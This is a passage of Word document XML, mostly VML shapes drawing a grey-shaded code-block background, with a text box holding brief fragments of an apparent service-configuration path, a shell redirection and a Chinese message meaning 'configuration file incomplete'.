            <v:rect id="_x0000_s9512" style="position:absolute;left:2108;top:362;width:121;height:259" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s9511" style="position:absolute;left:2229;top:362;width:241;height:259" fillcolor="#f8f8f8" stroked="f"/>
            <v:line id="_x0000_s9510" style="position:absolute" from="5,328" to="5,654" strokecolor="#ccc" strokeweight=".24pt"/>
            <v:line id="_x0000_s9509" style="position:absolute" from="6755,328" to="6755,654" strokecolor="#ccc" strokeweight=".24pt"/>
            <v:rect id="_x0000_s9508" style="position:absolute;left:8;top:654;width:6745;height:326" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s9507" style="position:absolute;left:188;top:718;width:916;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s9506" style="position:absolute;left:1104;top:718;width:916;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s9505" style="position:absolute;left:2020;top:718;width:723;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s9504" style="position:absolute;left:2743;top:718;width:120;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s9503" style="position:absolute;left:2863;top:718;width:723;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:line id="_x0000_s9502" style="position:absolute" from="5,654" to="5,980" strokecolor="#ccc" strokeweight=".24pt"/>
            <v:line id="_x0000_s9501" style="position:absolute" from="6755,654" to="6755,980" strokecolor="#ccc" strokeweight=".24pt"/>
            <v:rect id="_x0000_s9500" style="position:absolute;left:8;top:981;width:6745;height:326" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s9499" style="position:absolute;left:188;top:1043;width:916;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s9498" style="position:absolute;left:1104;top:1043;width:120;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:line id="_x0000_s9497" style="position:absolute" from="5,981" to="5,1307" strokecolor="#ccc" strokeweight=".24pt"/>
            <v:line id="_x0000_s9496" style="position:absolute" from="6755,981" to="6755,1307" strokecolor="#ccc" strokeweight=".24pt"/>
            <v:rect id="_x0000_s9495" style="position:absolute;left:8;top:1306;width:6745;height:326" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s9494" style="position:absolute;left:188;top:1369;width:120;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:line id="_x0000_s9493" style="position:absolute" from="5,1306" to="5,1632" strokecolor="#ccc" strokeweight=".24pt"/>
            <v:line id="_x0000_s9492" style="position:absolute" from="6755,1306" to="6755,1632" strokecolor="#ccc" strokeweight=".24pt"/>
            <v:rect id="_x0000_s9491" style="position:absolute;left:8;top:1633;width:6745;height:326" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s9490" style="position:absolute;left:188;top:1696;width:964;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s9489" style="position:absolute;left:1152;top:1696;width:120;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s9488" style="position:absolute;left:1272;top:1696;width:1567;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s9487" style="position:absolute;left:2839;top:1696;width:120;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s9486" style="position:absolute;left:2959;top:1696;width:1567;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s9485" style="position:absolute;left:4526;top:1696;width:120;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s9484" style="position:absolute;left:4646;top:1696;width:121;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:line id="_x0000_s9483" style="position:absolute" from="5,1633" to="5,1958" strokecolor="#ccc" strokeweight=".24pt"/>
            <v:line id="_x0000_s9482" style="position:absolute" from="6755,1633" to="6755,1958" strokecolor="#ccc" strokeweight=".24pt"/>
            <v:rect id="_x0000_s9481" style="position:absolute;left:8;top:1959;width:6745;height:326" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s9480" style="position:absolute;left:188;top:2021;width:120;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:line id="_x0000_s9479" style="position:absolute" from="5,1959" to="5,2285" strokecolor="#ccc" strokeweight=".24pt"/>
            <v:line id="_x0000_s9478" style="position:absolute" from="6755,1959" to="6755,2285" strokecolor="#ccc" strokeweight=".24pt"/>
            <v:rect id="_x0000_s9477" style="position:absolute;left:8;top:2284;width:6745;height:326" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s9476" style="position:absolute;left:188;top:2348;width:916;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s9475" style="position:absolute;left:1104;top:2348;width:723;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s9474" style="position:absolute;left:1827;top:2348;width:120;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s9473" style="position:absolute;left:1947;top:2348;width:1085;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:line id="_x0000_s9472" style="position:absolute" from="5,2284" to="5,2610" strokecolor="#ccc" strokeweight=".24pt"/>
            <v:line id="_x0000_s9471" style="position:absolute" from="6755,2284" to="6755,2610" strokecolor="#ccc" strokeweight=".24pt"/>
            <v:rect id="_x0000_s9470" style="position:absolute;left:8;top:2610;width:6745;height:326" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s9469" style="position:absolute;left:188;top:2674;width:916;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s9468" style="position:absolute;left:1104;top:2674;width:723;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s9467" style="position:absolute;left:1827;top:2674;width:120;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s9466" style="position:absolute;left:1947;top:2674;width:1687;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:line id="_x0000_s9465" style="position:absolute" from="5,2610" to="5,2936" strokecolor="#ccc" strokeweight=".24pt"/>
            <v:line id="_x0000_s9464" style="position:absolute" from="6755,2610" to="6755,2936" strokecolor="#ccc" strokeweight=".24pt"/>
            <v:rect id="_x0000_s9463" style="position:absolute;left:8;top:2936;width:6745;height:326" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s9462" style="position:absolute;left:188;top:3000;width:916;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s9461" style="position:absolute;left:1104;top:3000;width:1325;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:line id="_x0000_s9460" style="position:absolute" from="2470,3000" to="2470,3200" strokecolor="#f8f8f8" strokeweight="4.15pt"/>
            <v:rect id="_x0000_s9459" style="position:absolute;left:2512;top:3000;width:3254;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:line id="_x0000_s9458" style="position:absolute" from="5807,3000" to="5807,3200" strokecolor="#f8f8f8" strokeweight="4.15pt"/>
            <v:rect id="_x0000_s9457" style="position:absolute;left:5849;top:3000;width:724;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s9456" style="position:absolute;left:6573;top:3000;width:120;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:line id="_x0000_s9455" style="position:absolute" from="5,2936" to="5,3262" strokecolor="#ccc" strokeweight=".24pt"/>
            <v:line id="_x0000_s9454" style="position:absolute" from="6755,2936" to="6755,3262" strokecolor="#ccc" strokeweight=".24pt"/>
            <v:rect id="_x0000_s9453" style="position:absolute;left:8;top:3263;width:6745;height:326" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s9452" style="position:absolute;left:188;top:3325;width:241;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s9451" style="position:absolute;left:429;top:3325;width:120;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s9450" style="position:absolute;left:549;top:3325;width:5543;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s9449" style="position:absolute;left:6092;top:3325;width:121;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:line id="_x0000_s9448" style="position:absolute" from="5,3263" to="5,3589" strokecolor="#ccc" strokeweight=".24pt"/>
            <v:line id="_x0000_s9447" style="position:absolute" from="6755,3263" to="6755,3589" strokecolor="#ccc" strokeweight=".24pt"/>
            <v:rect id="_x0000_s9446" style="position:absolute;left:8;top:3589;width:6745;height:326" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s9445" style="position:absolute;left:188;top:3651;width:482;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s9444" style="position:absolute;left:670;top:3651;width:120;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s9443" style="position:absolute;left:790;top:3651;width:241;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:line id="_x0000_s9442" style="position:absolute" from="5,3589" to="5,3915" strokecolor="#ccc" strokeweight=".24pt"/>
            <v:line id="_x0000_s9441" style="position:absolute" from="6755,3589" to="6755,3915" strokecolor="#ccc" strokeweight=".24pt"/>
            <v:rect id="_x0000_s9440" style="position:absolute;left:8;top:3915;width:6745;height:326" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s9439" style="position:absolute;left:188;top:3978;width:120;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:line id="_x0000_s9438" style="position:absolute" from="5,3915" to="5,4241" strokecolor="#ccc" strokeweight=".24pt"/>
            <v:line id="_x0000_s9437" style="position:absolute" from="6755,3915" to="6755,4241" strokecolor="#ccc" strokeweight=".24pt"/>
            <v:rect id="_x0000_s9436" style="position:absolute;left:8;top:4240;width:6745;height:326" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s9435" style="position:absolute;left:188;top:4304;width:964;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s9434" style="position:absolute;left:1152;top:4304;width:120;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s9433" style="position:absolute;left:1272;top:4304;width:1808;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s9432" style="position:absolute;left:3080;top:4304;width:120;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s9431" style="position:absolute;left:3200;top:4304;width:1567;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s9430" style="position:absolute;left:4767;top:4304;width:120;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s9429" style="position:absolute;left:4887;top:4304;width:121;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:line id="_x0000_s9428" style="position:absolute" from="5,4240" to="5,4566" strokecolor="#ccc" strokeweight=".24pt"/>
            <v:line id="_x0000_s9427" style="position:absolute" from="6755,4240" to="6755,4566" strokecolor="#ccc" strokeweight=".24pt"/>
            <v:rect id="_x0000_s9426" style="position:absolute;left:8;top:4566;width:6745;height:326" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s9425" style="position:absolute;left:188;top:4630;width:120;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:line id="_x0000_s9424" style="position:absolute" from="5,4566" to="5,4892" strokecolor="#ccc" strokeweight=".24pt"/>
            <v:line id="_x0000_s9423" style="position:absolute" from="6755,4566" to="6755,4892" strokecolor="#ccc" strokeweight=".24pt"/>
            <v:rect id="_x0000_s9422" style="position:absolute;left:8;top:4893;width:6745;height:326" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s9421" style="position:absolute;left:188;top:4955;width:916;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s9420" style="position:absolute;left:1104;top:4955;width:723;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s9419" style="position:absolute;left:1827;top:4955;width:120;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s9418" style="position:absolute;left:1947;top:4955;width:1687;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:line id="_x0000_s9417" style="position:absolute" from="5,4893" to="5,5219" strokecolor="#ccc" strokeweight=".24pt"/>
            <v:line id="_x0000_s9416" style="position:absolute" from="6755,4893" to="6755,5219" strokecolor="#ccc" strokeweight=".24pt"/>
            <v:rect id="_x0000_s9415" style="position:absolute;left:8;top:5218;width:6745;height:326" fillcolor="#f8f8f8" stroked="f"/>
            <v:line id="_x0000_s9414" style="position:absolute" from="5,5218" to="5,5544" strokecolor="#ccc" strokeweight=".24pt"/>
            <v:line id="_x0000_s9413" style="position:absolute" from="6755,5218" to="6755,5544" strokecolor="#ccc" strokeweight=".24pt"/>
            <v:rect id="_x0000_s9412" style="position:absolute;left:8;top:5545;width:6745;height:326" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s9411" style="position:absolute;left:188;top:5608;width:916;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s9410" style="position:absolute;left:1104;top:5608;width:602;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s9409" style="position:absolute;left:1706;top:5608;width:121;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s9408" style="position:absolute;left:1827;top:5608;width:3253;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s9407" style="position:absolute;left:5080;top:5608;width:121;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s9406" style="position:absolute;left:5201;top:5608;width:241;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s9405" style="position:absolute;left:5442;top:5608;width:120;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s9404" style="position:absolute;left:5562;top:5608;width:121;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s9403" style="position:absolute;left:5683;top:5608;width:120;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s9402" style="position:absolute;left:5803;top:5608;width:482;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s9401" style="position:absolute;left:6285;top:5608;width:121;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:line id="_x0000_s9400" style="position:absolute" from="5,5545" to="5,5871" strokecolor="#ccc" strokeweight=".24pt"/>
            <v:line id="_x0000_s9399" style="position:absolute" from="6755,5545" to="6755,5871" strokecolor="#ccc" strokeweight=".24pt"/>
            <v:rect id="_x0000_s9398" style="position:absolute;left:8;top:5870;width:6745;height:326" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s9397" style="position:absolute;left:188;top:5933;width:2289;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:line id="_x0000_s9396" style="position:absolute" from="2503,5933" to="2503,6133" strokecolor="#f8f8f8" strokeweight="2.6pt"/>
            <v:rect id="_x0000_s9395" style="position:absolute;left:2529;top:5933;width:241;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:line id="_x0000_s9394" style="position:absolute" from="2795,5933" to="2795,6133" strokecolor="#f8f8f8" strokeweight="2.55pt"/>
            <v:rect id="_x0000_s9393" style="position:absolute;left:2821;top:5933;width:120;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:line id="_x0000_s9392" style="position:absolute" from="2967,5933" to="2967,6133" strokecolor="#f8f8f8" strokeweight="2.6pt"/>
            <v:rect id="_x0000_s9391" style="position:absolute;left:2993;top:5933;width:361;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:line id="_x0000_s9390" style="position:absolute" from="3380,5933" to="3380,6133" strokecolor="#f8f8f8" strokeweight="2.6pt"/>
            <v:rect id="_x0000_s9389" style="position:absolute;left:3406;top:5933;width:361;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:line id="_x0000_s9388" style="position:absolute" from="3793,5933" to="3793,6133" strokecolor="#f8f8f8" strokeweight="2.6pt"/>
            <v:rect id="_x0000_s9387" style="position:absolute;left:3819;top:5933;width:843;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:line id="_x0000_s9386" style="position:absolute" from="4688,5933" to="4688,6133" strokecolor="#f8f8f8" strokeweight="2.6pt"/>
            <v:rect id="_x0000_s9385" style="position:absolute;left:4714;top:5933;width:723;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:line id="_x0000_s9384" style="position:absolute" from="5462,5933" to="5462,6133" strokecolor="#f8f8f8" strokeweight="2.55pt"/>
            <v:rect id="_x0000_s9383" style="position:absolute;left:5488;top:5933;width:1084;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s9382" style="position:absolute;left:6572;top:5933;width:121;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:line id="_x0000_s9381" style="position:absolute" from="5,5870" to="5,6196" strokecolor="#ccc" strokeweight=".24pt"/>
            <v:line id="_x0000_s9380" style="position:absolute" from="6755,5870" to="6755,6196" strokecolor="#ccc" strokeweight=".24pt"/>
            <v:rect id="_x0000_s9379" style="position:absolute;left:8;top:6197;width:6745;height:326" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s9378" style="position:absolute;left:188;top:6260;width:482;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s9377" style="position:absolute;left:670;top:6260;width:120;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s9376" style="position:absolute;left:790;top:6260;width:241;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:line id="_x0000_s9375" style="position:absolute" from="5,6197" to="5,6523" strokecolor="#ccc" strokeweight=".24pt"/>
            <v:line id="_x0000_s9374" style="position:absolute" from="6755,6197" to="6755,6523" strokecolor="#ccc" strokeweight=".24pt"/>
            <v:rect id="_x0000_s9373" style="position:absolute;left:8;top:6523;width:6745;height:326" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s9372" style="position:absolute;left:188;top:6585;width:916;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s9371" style="position:absolute;left:1104;top:6585;width:843;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s9370" style="position:absolute;left:1947;top:6585;width:121;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s9369" style="position:absolute;left:2068;top:6585;width:1325;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s9368" style="position:absolute;left:3393;top:6585;width:121;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s9367" style="position:absolute;left:3514;top:6585;width:120;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s9366" style="position:absolute;left:3634;top:6585;width:121;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s9365" style="position:absolute;left:3755;top:6585;width:120;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:line id="_x0000_s9364" style="position:absolute" from="5,6523" to="5,6849" strokecolor="#ccc" strokeweight=".24pt"/>
            <v:line id="_x0000_s9363" style="position:absolute" from="6755,6523" to="6755,6849" strokecolor="#ccc" strokeweight=".24pt"/>
            <v:rect id="_x0000_s9362" style="position:absolute;left:8;top:6848;width:6745;height:326" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s9361" style="position:absolute;left:188;top:6912;width:916;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s9360" style="position:absolute;left:1104;top:6912;width:916;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s9359" style="position:absolute;left:2020;top:6912;width:482;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s9358" style="position:absolute;left:2502;top:6912;width:120;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s9357" style="position:absolute;left:2622;top:6912;width:362;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:line id="_x0000_s9356" style="position:absolute" from="5,6848" to="5,7174" strokecolor="#ccc" strokeweight=".24pt"/>
            <v:line id="_x0000_s9355" style="position:absolute" from="6755,6848" to="6755,7174" strokecolor="#ccc" strokeweight=".24pt"/>
            <v:rect id="_x0000_s9354" style="position:absolute;left:8;top:7175;width:6745;height:326" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s9353" style="position:absolute;left:188;top:7208;width:916;height:259" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s9352" style="position:absolute;left:1104;top:7208;width:916;height:259" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s9351" style="position:absolute;left:2020;top:7208;width:916;height:259" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s9350" style="position:absolute;left:2936;top:7208;width:723;height:259" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s9349" style="position:absolute;left:3659;top:7208;width:120;height:259" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s9348" style="position:absolute;left:3779;top:7208;width:121;height:259" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s9347" style="position:absolute;left:3900;top:7208;width:600;height:259" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s9346" style="position:absolute;left:4500;top:7208;width:241;height:259" fillcolor="#f8f8f8" stroked="f"/>
            <v:line id="_x0000_s9345" style="position:absolute" from="5,7175" to="5,7501" strokecolor="#ccc" strokeweight=".24pt"/>
            <v:line id="_x0000_s9344" style="position:absolute" from="6755,7175" to="6755,7501" strokecolor="#ccc" strokeweight=".24pt"/>
            <v:rect id="_x0000_s9343" style="position:absolute;left:8;top:7500;width:6745;height:326" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s9342" style="position:absolute;left:188;top:7563;width:916;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s9341" style="position:absolute;left:1104;top:7563;width:916;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s9340" style="position:absolute;left:2020;top:7563;width:482;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s9339" style="position:absolute;left:2502;top:7563;width:120;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s9338" style="position:absolute;left:2622;top:7563;width:1085;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:line id="_x0000_s9337" style="position:absolute" from="5,7500" to="5,7826" strokecolor="#ccc" strokeweight=".24pt"/>
            <v:line id="_x0000_s9336" style="position:absolute" from="6755,7500" to="6755,7826" strokecolor="#ccc" strokeweight=".24pt"/>
            <v:rect id="_x0000_s9335" style="position:absolute;left:8;top:7827;width:6745;height:326" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s9334" style="position:absolute;left:188;top:7860;width:916;height:259" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s9333" style="position:absolute;left:1104;top:7860;width:916;height:259" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s9332" style="position:absolute;left:2020;top:7860;width:916;height:259" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s9331" style="position:absolute;left:2936;top:7860;width:723;height:259" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s9330" style="position:absolute;left:3659;top:7860;width:120;height:259" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s9329" style="position:absolute;left:3779;top:7860;width:121;height:259" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s9328" style="position:absolute;left:3900;top:7860;width:600;height:259" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s9327" style="position:absolute;left:4500;top:7860;width:241;height:259" fillcolor="#f8f8f8" stroked="f"/>
            <v:line id="_x0000_s9326" style="position:absolute" from="5,7827" to="5,8153" strokecolor="#ccc" strokeweight=".24pt"/>
            <v:line id="_x0000_s9325" style="position:absolute" from="6755,7827" to="6755,8153" strokecolor="#ccc" strokeweight=".24pt"/>
            <v:rect id="_x0000_s9324" style="position:absolute;left:8;top:8153;width:6745;height:326" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s9323" style="position:absolute;left:188;top:8215;width:916;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s9322" style="position:absolute;left:1104;top:8215;width:916;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s9321" style="position:absolute;left:2020;top:8215;width:482;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s9320" style="position:absolute;left:2502;top:8215;width:120;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s9319" style="position:absolute;left:2622;top:8215;width:844;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:line id="_x0000_s9318" style="position:absolute" from="5,8153" to="5,8479" strokecolor="#ccc" strokeweight=".24pt"/>
            <v:line id="_x0000_s9317" style="position:absolute" from="6755,8153" to="6755,8479" strokecolor="#ccc" strokeweight=".24pt"/>
            <v:rect id="_x0000_s9316" style="position:absolute;left:8;top:8478;width:6745;height:326" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s9315" style="position:absolute;left:188;top:8542;width:916;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s9314" style="position:absolute;left:1104;top:8542;width:916;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s9313" style="position:absolute;left:2020;top:8542;width:482;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s9312" style="position:absolute;left:2502;top:8542;width:120;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s9311" style="position:absolute;left:2622;top:8542;width:1326;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:line id="_x0000_s9310" style="position:absolute" from="5,8478" to="5,8804" strokecolor="#ccc" strokeweight=".24pt"/>
            <v:line id="_x0000_s9309" style="position:absolute" from="6755,8478" to="6755,8804" strokecolor="#ccc" strokeweight=".24pt"/>
            <v:rect id="_x0000_s9308" style="position:absolute;left:8;top:8805;width:6745;height:326" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s9307" style="position:absolute;left:188;top:8838;width:916;height:259" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s9306" style="position:absolute;left:1104;top:8838;width:916;height:259" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s9305" style="position:absolute;left:2020;top:8838;width:916;height:259" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s9304" style="position:absolute;left:2936;top:8838;width:723;height:259" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s9303" style="position:absolute;left:3659;top:8838;width:120;height:259" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s9302" style="position:absolute;left:3779;top:8838;width:121;height:259" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s9301" style="position:absolute;left:3900;top:8838;width:600;height:259" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s9300" style="position:absolute;left:4500;top:8838;width:241;height:259" fillcolor="#f8f8f8" stroked="f"/>
            <v:line id="_x0000_s9299" style="position:absolute" from="5,8805" to="5,9131" strokecolor="#ccc" strokeweight=".24pt"/>
            <v:line id="_x0000_s9298" style="position:absolute" from="6755,8805" to="6755,9131" strokecolor="#ccc" strokeweight=".24pt"/>
            <v:rect id="_x0000_s9297" style="position:absolute;left:8;top:9130;width:6745;height:326" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s9296" style="position:absolute;left:188;top:9193;width:916;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s9295" style="position:absolute;left:1104;top:9193;width:120;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:line id="_x0000_s9294" style="position:absolute" from="5,9130" to="5,9456" strokecolor="#ccc" strokeweight=".24pt"/>
            <v:line id="_x0000_s9293" style="position:absolute" from="6755,9130" to="6755,9456" strokecolor="#ccc" strokeweight=".24pt"/>
            <v:rect id="_x0000_s9292" style="position:absolute;left:8;top:9457;width:6745;height:506" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s9291" style="position:absolute;left:188;top:9520;width:120;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:line id="_x0000_s9290" style="position:absolute" from="3,9965" to="6757,9965" strokecolor="#ccc" strokeweight=".24pt"/>
            <v:line id="_x0000_s9289" style="position:absolute" from="5,9457" to="5,9967" strokecolor="#ccc" strokeweight=".24pt"/>
            <v:line id="_x0000_s9288" style="position:absolute" from="6755,9457" to="6755,9967" strokecolor="#ccc" strokeweight=".24pt"/>
            <v:shape id="_x0000_s9287" type="#_x0000_t202" style="position:absolute;left:5;top:3;width:6750;height:9963" filled="f" stroked="f">
              <v:textbox inset="0,0,0,0">
                <w:txbxContent>
                  <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
                    <w:pPr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/kssl/HRP/cfg/$service_path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2&gt;&amp;1",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true,</w:t>
                    </w:r>
                    <w:r>
                      <w:rPr>
                        <w:color w:val="333333"/>
                        <w:spacing w:val="-69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配置文件不完整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</w:p>
